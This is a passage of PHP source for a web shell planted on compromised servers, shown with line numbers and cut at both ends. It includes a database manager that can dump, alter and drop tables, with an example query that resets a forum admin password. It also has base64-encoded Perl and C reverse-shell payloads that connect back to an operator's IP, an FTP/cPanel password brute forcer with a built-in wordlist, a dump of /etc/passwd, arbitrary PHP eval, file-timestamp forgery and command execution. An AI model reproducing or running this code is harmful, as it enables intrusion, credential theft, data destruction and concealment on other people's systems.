778 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
779 }
780 if(isset($dbuser)) {
781 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
782 }
783 if(isset($dbpass)) {
784 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
785 }
786 if(isset($dbport)) {
787 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
788 }
789 if(isset($dbname)) {
790 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
791 }
792 if(isset($charset)) {
793 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
794 }
795
796 if ($doing == 'backupmysql' && $saveasfile) {
797 if (!$table) {
798 m('Please choose the table');
799 } else {
800 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
801 $table = array_flip($table);
802 $fp = @fopen($path,'w');
803 if ($fp) {
804 $result = q('SHOW tables');
805 if (!$result) p('<h2>'.mysql_error().'</h2>');
806 $mysqldata = '';
807 while ($currow = mysql_fetch_array($result)) {
808 if (isset($table[$currow[0]])) {
809 sqldumptable($currow[0], $fp);
810 }
811 }
812 fclose($fp);
813 $fileurl = str_replace(SA_ROOT,'',$path);
814 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
815 mysql_close();
816 } else {
817 m('Backup failed');
818 }
819 }
820 }
821 if ($insert && $insertsql) {
822 $keystr = $valstr = $tmp = '';
823 foreach($insertsql as $key => $val) {
824 if ($val) {
825 $keystr .= $tmp.$key;
826 $valstr .= $tmp."'".addslashes($val)."'";
827 $tmp = ',';
828 }
829 }
830 if ($keystr && $valstr) {
831 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
832 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
833 }
834 }
835 if ($update && $insertsql && $base64) {
836 $valstr = $tmp = '';
837 foreach($insertsql as $key => $val) {
838 $valstr .= $tmp.$key."='".addslashes($val)."'";
839 $tmp = ',';
840 }
841 if ($valstr) {
842 $where = base64_decode($base64);
843 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
844 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
845 }
846 }
847 if ($doing == 'del' && $base64) {
848 $where = base64_decode($base64);
849 $delete_sql = "DELETE FROM $tablename WHERE $where";
850 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
851 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
852 }
853
854 if ($tablename && $doing == 'drop') {
855 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
856 if (q("DROP TABLE $tablename")) {
857 m('Drop table of success');
858 $tablename = '';
859 } else {
860 m(mysql_error());
861 }
862 }
863
864 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
865
866 formhead(array('title'=>'MYSQL Manager'));
867 makehide('action','sqladmin');
868 p('<p>');
869 p('DBHost:');
870 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
871 p(':');
872 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
873 p('DBUser:');
874 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
875 p('DBPass:');
876 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
877 p('DBCharset:');
878 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
879 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
880 p('</p>');
881 formfoot();
882?>
883<script type="text/javascript">
884function editrecord(action, base64, tablename){
885 if (action == 'del') {
886 if (!confirm('Is or isn\'t deletion record?')) return;
887 }
888 $('recordlist').doing.value=action;
889 $('recordlist').base64.value=base64;
890 $('recordlist').tablename.value=tablename;
891 $('recordlist').submit();
892}
893function moddbname(dbname) {
894 if(!dbname) return;
895 $('setdbname').dbname.value=dbname;
896 $('setdbname').submit();
897}
898function settable(tablename,doing,page) {
899 if(!tablename) return;
900 if (doing) {
901 $('settable').doing.value=doing;
902 }
903 if (page) {
904 $('settable').page.value=page;
905 }
906 $('settable').tablename.value=tablename;
907 $('settable').submit();
908}
909</script>
910<?php
911 // SQL
912 formhead(array('name'=>'recordlist'));
913 makehide('doing');
914 makehide('action','sqladmin');
915 makehide('base64');
916 makehide('tablename');
917 p($dbform);
918 formfoot();
919
920 // Data
921 formhead(array('name'=>'setdbname'));
922 makehide('action','sqladmin');
923 p($dbform);
924 if (!$dbname) {
925 makehide('dbname');
926 }
927 formfoot();
928
929
930 formhead(array('name'=>'settable'));
931 makehide('action','sqladmin');
932 p($dbform);
933 makehide('tablename');
934 makehide('page',$page);
935 makehide('doing');
936 formfoot();
937
938 $cachetables = array();
939 $pagenum = 30;
940 $page = intval($page);
941 if($page) {
942 $start_limit = ($page - 1) * $pagenum;
943 } else {
944 $start_limit = 0;
945 $page = 1;
946 }
947 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
948 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
949 // get mysql server
950 $mysqlver = mysql_get_server_info();
951 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
952 $highver = $mysqlver > '4.1' ? 1 : 0;
953
954 // Show database
955 $query = q("SHOW DATABASES");
956 $dbs = array();
957 $dbs[] = '-- Select a database --';
958 while($db = mysql_fetch_array($query)) {
959 $dbs[$db['Database']] = $db['Database'];
960 }
961 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
962 $tabledb = array();
963 if ($dbname) {
964 p('<p>');
965 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
966 if ($tablename) {
967 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
968 }
969 p('</p>');
970 mysql_select_db($dbname);
971
972 $getnumsql = '';
973 $runquery = 0;
974 if ($sql_query) {
975 $runquery = 1;
976 }
977 $allowedit = 0;
978 if ($tablename && !$sql_query) {
979 $sql_query = "SELECT * FROM $tablename";
980 $getnumsql = $sql_query;
981 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
982 $allowedit = 1;
983 }
984 p('<form action="'.$self.'" method="POST">');
985 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>tmt</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
986 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
987 makehide('tablename', $tablename);
988 makehide('action','sqladmin');
989 p($dbform);
990 p('</form>');
991 if ($tablename || ($runquery && $sql_query)) {
992 if ($doing == 'structure') {
993 $result = q("SHOW COLUMNS FROM $tablename");
994 $rowdb = array();
995 while($row = mysql_fetch_array($result)) {
996 $rowdb[] = $row;
997 }
998 p('<table border="0" cellpadding="3" cellspacing="0">');
999 p('<tr class="head">');
1000 p('<td>Field</td>');
1001 p('<td>Type</td>');
1002 p('<td>Null</td>');
1003 p('<td>Key</td>');
1004 p('<td>Default</td>');
1005 p('<td>Extra</td>');
1006 p('</tr>');
1007 foreach ($rowdb as $row) {
1008 $thisbg = bg();
1009 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1010 p('<td>'.$row['Field'].'</td>');
1011 p('<td>'.$row['Type'].'</td>');
1012 p('<td>'.$row['Null'].' </td>');
1013 p('<td>'.$row['Key'].' </td>');
1014 p('<td>'.$row['Default'].' </td>');
1015 p('<td>'.$row['Extra'].' </td>');
1016 p('</tr>');
1017 }
1018 tbfoot();
1019 } elseif ($doing == 'insert' || $doing == 'edit') {
1020 $result = q('SHOW COLUMNS FROM '.$tablename);
1021 while ($row = mysql_fetch_array($result)) {
1022 $rowdb[] = $row;
1023 }
1024 $rs = array();
1025 if ($doing == 'insert') {
1026 p('<h2>Insert new line in '.$tablename.' table »</h2>');
1027 } else {
1028 p('<h2>Update record in '.$tablename.' table »</h2>');
1029 $where = base64_decode($base64);
1030 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1031 $rs = mysql_fetch_array($result);
1032 }
1033 p('<form method="post" action="'.$self.'">');
1034 p($dbform);
1035 makehide('action','sqladmin');
1036 makehide('tablename',$tablename);
1037 p('<table border="0" cellpadding="3" cellspacing="0">');
1038 foreach ($rowdb as $row) {
1039 if ($rs[$row['Field']]) {
1040 $value = htmlspecialchars($rs[$row['Field']]);
1041 } else {
1042 $value = '';
1043 }
1044 $thisbg = bg();
1045 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1046 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1047 }
1048 if ($doing == 'insert') {
1049 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1050 } else {
1051 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1052 makehide('base64', $base64);
1053 }
1054 p('</table></form>');
1055 } else {
1056 $querys = @explode(';',$sql_query);
1057 foreach($querys as $num=>$query) {
1058 if ($query) {
1059 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1060 switch(qy($query))
1061 {
1062 case 0:
1063 p('<h2>Error : '.mysql_error().'</h2>');
1064 break;
1065 case 1:
1066 if (strtolower(substr($query,0,13)) == 'select * from') {
1067 $allowedit = 1;
1068 }
1069 if ($getnumsql) {
1070 $tatol = mysql_num_rows(q($getnumsql));
1071 $multipage = multi($tatol, $pagenum, $page, $tablename);
1072 }
1073 if (!$tablename) {
1074 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1075 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1076 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1077 $tablename = $matches[1][0];
1078 }
1079 $result = q($query);
1080 p($multipage);
1081 p('<table border="0" cellpadding="3" cellspacing="0">');
1082 p('<tr class="head">');
1083 if ($allowedit) p('<td>Action</td>');
1084 $fieldnum = @mysql_num_fields($result);
1085 for($i=0;$i<$fieldnum;$i++){
1086 $name = @mysql_field_name($result, $i);
1087 $type = @mysql_field_type($result, $i);
1088 $len = @mysql_field_len($result, $i);
1089 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1090 }
1091 p('</tr>');
1092 while($mn = @mysql_fetch_assoc($result)){
1093 $thisbg = bg();
1094 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1095 $where = $tmp = $b1 = '';
1096 foreach($mn as $key=>$inside){
1097 if ($inside) {
1098 $where .= $tmp.$key."='".addslashes($inside)."'";
1099 $tmp = ' AND ';
1100 }
1101 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
1102 }
1103 $where = base64_encode($where);
1104 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1105 p($b1);
1106 p('</tr>');
1107 unset($b1);
1108 }
1109 tbfoot();
1110 p($multipage);
1111 break;
1112 case 2:
1113 $ar = mysql_affected_rows();
1114 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1115 break;
1116 }
1117 }
1118 }
1119 }
1120 } else {
1121 $query = q("SHOW TABLE STATUS");
1122 $table_num = $table_rows = $data_size = 0;
1123 $tabledb = array();
1124 while($table = mysql_fetch_array($query)) {
1125 $data_size = $data_size + $table['Data_length'];
1126 $table_rows = $table_rows + $table['Rows'];
1127 $table['Data_length'] = sizecount($table['Data_length']);
1128 $table_num++;
1129 $tabledb[] = $table;
1130 }
1131 $data_size = sizecount($data_size);
1132 unset($table);
1133 p('<table border="0" cellpadding="0" cellspacing="0">');
1134 p('<form action="'.$self.'" method="POST">');
1135 makehide('action','sqladmin');
1136 p($dbform);
1137 p('<tr class="head">');
1138 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1139 p('<td>Name</td>');
1140 p('<td>Rows</td>');
1141 p('<td>Data_length</td>');
1142 p('<td>Create_time</td>');
1143 p('<td>Update_time</td>');
1144 if ($highver) {
1145 p('<td>Engine</td>');
1146 p('<td>Collation</td>');
1147 }
1148 p('</tr>');
1149 foreach ($tabledb as $key => $table) {
1150 $thisbg = bg();
1151 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1152 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1153 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
1154 p('<td>'.$table['Rows'].'</td>');
1155 p('<td>'.$table['Data_length'].'</td>');
1156 p('<td>'.$table['Create_time'].'</td>');
1157 p('<td>'.$table['Update_time'].'</td>');
1158 if ($highver) {
1159 p('<td>'.$table['Engine'].'</td>');
1160 p('<td>'.$table['Collation'].'</td>');
1161 }
1162 p('</tr>');
1163 }
1164 p('<tr class=fout>');
1165 p('<td> </td>');
1166 p('<td>Total tables: '.$table_num.'</td>');
1167 p('<td>'.$table_rows.'</td>');
1168 p('<td>'.$data_size.'</td>');
1169 p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
1170 p('</tr>');
1171
1172 p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1173 makehide('doing','backupmysql');
1174 formfoot();
1175 p("</table>");
1176 fr($query);
1177 }
1178 }
1179 }
1180 tbfoot();
1181 @mysql_close();
1182}//end sql backup
1183
1184
1185elseif ($action == 'backconnect') {
1186 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1187 !$yourport && $yourport = '12345';
1188 $usedb = array('perl'=>'perl','c'=>'c');
1189
1190 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1191 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1192 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1193 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1194 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1195 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1196 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1197 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1198 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1199 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1200 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1201 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1202 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1203 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1204 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1205
1206 if ($start && $yourip && $yourport && $use){
1207 if ($use == 'perl') {
1208 cf('/tmp/angel_bc',$back_connect);
1209 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1210 } else {
1211 cf('/tmp/angel_bc.c',$back_connect_c);
1212 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1213 @unlink('/tmp/angel_bc.c');
1214 $res = execute("/tmp/angel_bc $yourip $yourport &");
1215 }
1216 m("Now script try connect to $yourip port $yourport ...");
1217 }
1218
1219 formhead(array('title'=>'Back Connect'));
1220 makehide('action','backconnect');
1221 p('<p>');
1222 p('Your IP:');
1223 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1224 p('Your Port:');
1225 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1226 p('Use:');
1227 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1228 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1229 p('</p>');
1230 formfoot();
1231}//end backconnect window via NC
1232
1233// Brute
1234elseif ($action == 'brute') {
1235formhead(array('title'=>'Brute Forcer'));
1236 makehide('action','brute');
1237 makehide('dir',$brute);
1238@ini_set('memory_limit', 1000000000000);
1239$connect_timeout=5;
1240@set_time_limit(0);
1241$submit = $_REQUEST['submit'];
1242$users = $_REQUEST['users'];
1243$pass = $_REQUEST['passwords'];
1244$target = $_REQUEST['target'];
1245$option = $_REQUEST['option'];
1246
1247
1248$passlist = "0123456
124901234567
1250012345678
12510123456789
125201234567890
1253123456
12541234567
125512345678
1256123456789
12571234567890
1258111111
1259000000
1260222222
1261333333
1262444444
1263555555
1264666666
1265777777
1266888888
1267999999
1268123123
1269456456
1270789789
1271123321
1272456654
1273654321
12747654321
127587654321
1276987654321
12770987654321
1278admin
1279administrator
1280admincp
1281cpanel
1282adminx
1283admins
1284password
1285passwords
1286passw0rd
1287p@ssw0rd
1288p@ssword
1289khongco
129025251325
1291passw0rds";
1292if($target == ''){
1293$target = 'localhost';
1294}
1295print " <div align='center'>
1296<form method='post' style='border: 1px solid #000000'><br><br>
1297<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1298<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1299<div align='center'><br>
1300<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1301<tr>
1302<td align='center'>
1303<b>Username</b></td>
1304<td>
1305<p align='center'>
1306<b>Password</b></td>
1307</tr>
1308</table>
1309<p align='center'>
1310<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1311$i = 0;
1312while ($i < 60000) {
1313
1314 $line = posix_getpwuid($i);
1315 if (!empty($line)) {
1316
1317 while (list ($key, $tmt_etcpwd) = each($line)){
1318 echo "".$tmt_etcpwd."\n";
1319 break;
1320 }
1321
1322 }
1323
1324 $i++;
1325}
1326echo "
1327</textarea>
1328<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1329<br>
1330<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1331<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1332</td></tr></table></td></tr></form><p align= 'left'>";
1333?>
1334<?php
1335function ftp_check($host,$user,$pass,$timeout){
1336$ch = curl_init();
1337curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1338curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1339curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1340curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1341curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1342curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1343curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1344$data = curl_exec($ch);
1345if ( curl_errno($ch) == 28 ) {
1346
1347print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1348exit;}
1349
1350elseif ( curl_errno($ch) == 0 ){
1351
1352p("<b>[ b4@live.fr ]# </b>
1353<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1354}
1355curl_close($ch);}
1356
1357function cpanel_check($host,$user,$pass,$timeout){
1358$ch = curl_init();
1359curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1360curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1361curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1362curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1363curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1364curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1365$data = curl_exec($ch);
1366if ( curl_errno($ch) == 28 ) {
1367print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1368exit;}
1369elseif ( curl_errno($ch) == 0 ){
1370
1371p("<b>[ b4@live.fr ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
1372
1373if(isset($submit) && !empty($submit)){
1374
1375$userlist = explode ("\n" , $users );
1376$passlist = explode ("\n" , $pass );
1377p('<b>[ attack@yabod ]# Attacking ...</font></b><br>');
1378foreach ($userlist as $user) {
1379$_user = trim($user);
1380foreach ($passlist as $password ) {
1381$_pass = trim($password);
1382if($option == "ftp"){
1383ftp_check($target,$_user,$_pass,$connect_timeout);
1384}
1385if ($option == "cpanel")
1386{
1387cpanel_check($target,$_user,$_pass,$connect_timeout);
1388}
1389}
1390}
1391}
1392
1393 formfoot();
1394}
1395
1396
1397
1398
1399
1400
1401elseif ($action == 'etcpwd') {
1402formhead(array('title'=>'Get /etc/passwd'));
1403 makehide('action','etcpwd');
1404 makehide('dir',$nowpath);
1405$i = 0;
1406 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1407while ($i < 60000) {
1408
1409 $line = posix_getpwuid($i);
1410 if (!empty($line)) {
1411
1412 while (list ($key, $tmt_etcpwd) = each($line)){
1413 echo "".$tmt_etcpwd."\n";
1414 break;
1415 }
1416
1417 }
1418
1419 $i++;
1420}
1421 echo "</textarea></p>";
1422 formfoot();
1423}
1424
1425elseif ($action == 'eval') {
1426 $phpcode = trim($phpcode);
1427 if($phpcode){
1428 if (!preg_match('#<\?#si', $phpcode)) {
1429 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1430 }
1431 eval("?".">$phpcode<?");
1432 }
1433 formhead(array('title'=>'Eval PHP Code'));
1434 makehide('action','eval');
1435 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1436 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1437 formfooter();
1438}//end eval
1439
1440elseif ($action == 'editfile') {
1441 if(file_exists($opfile)) {
1442 $fp=@fopen($opfile,'r');
1443 $contents=@fread($fp, filesize($opfile));
1444 @fclose($fp);
1445 $contents=htmlspecialchars($contents);
1446 }
1447 formhead(array('title'=>'Create / Edit File'));
1448 makehide('action','file');
1449 makehide('dir',$nowpath);
1450 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1451 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1452 formfooter();
1453}//end editfile
1454
1455elseif ($action == 'newtime') {
1456 $opfilemtime = @filemtime($opfile);
1457 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1458 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1459 formhead(array('title'=>'Clone file was last modified time'));
1460 makehide('action','file');
1461 makehide('dir',$nowpath);
1462 makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1463 makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1464 formfooter();
1465 formhead(array('title'=>'Set last modified'));
1466 makehide('action','file');
1467 makehide('dir',$nowpath);
1468 makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1469 p('<p>Instead »');
1470 p('year:');
1471 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1472 p('month:');
1473 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1474 p('day:');
1475 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1476 p('hour:');
1477 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1478 p('minute:');
1479 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1480 p('second:');
1481 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1482 p('</p>');
1483 formfooter();
1484}//end newtime
1485
1486elseif ($action == 'shell') {
1487 if (IS_WIN && IS_COM) {
1488 if($program && $parameter) {
1489 $shell= new COM('Shell.Application');
1490 $a = $shell->ShellExecute($program,$parameter);
1491 m('Program run has '.(!$a ? 'success' : 'fail'));
1492 }
1493 !$program && $program = 'c:\windows\system32\cmd.exe';
1494 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1495 formhead(array('title'=>'Execute Program'));
1496 makehide('action','shell');
1497 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1498 p('<p>');
1499 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1500 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1501 p('</p>');
1502 formfoot();
1503 }
1504 formhead(array('title'=>'Execute Command'));
1505 makehide('action','shell');
1506 if (IS_WIN && IS_COM) {
1507 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1508 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1509 }
1510 p('<p>');
1511 makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
1512 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1513 p('</p>');
1514 formfoot();
1515
1516 if ($command) {
1517 p('<hr width="100%" noshade /><pre>');
